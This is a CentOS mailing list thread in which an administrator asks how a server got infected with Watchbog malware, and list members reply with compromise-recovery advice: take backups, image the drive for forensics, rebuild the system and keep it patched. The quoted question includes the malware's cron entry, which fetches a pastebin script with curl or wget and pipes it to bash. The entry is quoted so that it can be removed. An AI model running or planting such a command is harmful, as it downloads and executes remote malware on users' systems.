Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan kaushalshriyan@gmail.com wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw areransomware.html to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp%7C%7Cwget -q -O- https://pastebin.com/raw/aGTSGJJp)%7Cbash > /dev/null 2>&1 3)ps aux | grep watchbog kill -9 pidof watchbog
Any suggestions or recommendations to find out how CentOS 7.5 Linux box got infected with Watchbog Malware. Is there any open source software which can
do you have untampered log files?
be installed on CentOS 7.5 Linux box to detect and prevent Malware?
Standard compromise recovery procedure since forever is (your local policy my have slightly different order about notifications and similar):
- back up all user data
You should have been doing that all along.
First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics.
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups. <snip> Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress).
mark
On 12/18/18 8:31 AM, mark wrote:
Valeri Galtsev wrote:
On 12/17/18 2:57 PM, Mauricio Tavares wrote:
On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan kaushalshriyan@gmail.com wrote:
Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw areransomware.html to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp%7C%7Cwget -q -O- https://pastebin.com/raw/aGTSGJJp)%7Cbash > /dev/null 2>&1 3)ps aux | grep watchbog kill -9 pidof watchbog
Any suggestions or recommendations to find out how CentOS 7.5 Linux box got infected with Watchbog Malware. Is there any open source software which can
do you have untampered log files?
be installed on CentOS 7.5 Linux box to detect and prevent Malware?
Standard compromise recovery procedure since forever is (your local policy my have slightly different order about notifications and similar):
- back up all user data
You should have been doing that all along.
Do not exclude this from the [more or less] full list of standard compromise recovery routine I tried to outline. Even though you had to do backups all the time, backup at this point may have latest changes not present in latest routine backup. And you last had o restore something from your backup how many years ago? So your knowledge that that backup indeed works was tested years ago...
First step, before you do anything else, is pull the hard drive, put it into a hot-swap or external bay, and dd the entire drive to an identical one. THAT goes to forensics.
Indeed. Or adjust this part to "everything is hosted on hardware RAID device", for which you will have to boot off DVD, mount and dump all elsewhere for forensics.
But! Forensics is different and sophisticated story, and when you learn in depth that the first thing you will learn is: Powering off the system, or even just disconnecting from the network may prevent you totally from learning several things about compromise. But this is really huge subject...
Alternatively, pull the h/d, put in a new one, reset the BIOS to factory settings - that includes pulling the battery... *then* set what you need, and then build it new, and restore from backups.
<snip> Why, yes, we did just do this, um, last year, after a compromise via a WordPress security hole. It did not manage to get to any other systems (we checked, and only a few run WordPress).
And yes, preventing, no matter how tedious it may seem is orders of magnitude easier than recovering from compromise. So: secure the box. And update, update, update....
Valeri
mark
CentOS mailing list CentOS@centos.org https://lists.centos.org/mailman/listinfo/centos
-
mark -
Valeri Galtsev